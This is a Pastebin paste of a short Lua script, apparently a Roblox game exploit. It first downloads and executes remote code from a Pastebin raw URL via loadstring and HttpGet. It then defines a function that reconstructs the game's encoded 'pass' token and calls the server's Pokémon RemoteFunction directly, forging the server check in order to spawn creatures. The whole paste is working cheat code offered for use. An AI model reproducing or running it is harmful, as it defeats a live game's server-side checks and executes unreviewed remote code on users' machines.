Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- loadstring(game:HttpGet("https://pastebin.com/raw/8qrgSuaU", true))()
- _G.PlayingCheckers = function(pokemon, party, level, leavethistrueiguess)
- local Encrypt = function(CodeSource)
- local StringCode = '';
- for i = 1, #CodeSource do
- StringCode = StringCode ..string.char(48)..string.byte(string.sub(CodeSource,i,i));
- end
- return StringCode;
- end
- local pass = Encrypt(game.Players.LocalPlayer.Name..level..pokemon)
- game.ReplicatedStorage.REvents.Pokemon.iwillknowXD:InvokeServer(pokemon, party, level, leavethistrueiguess, leavethistrueiguess, pass)
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement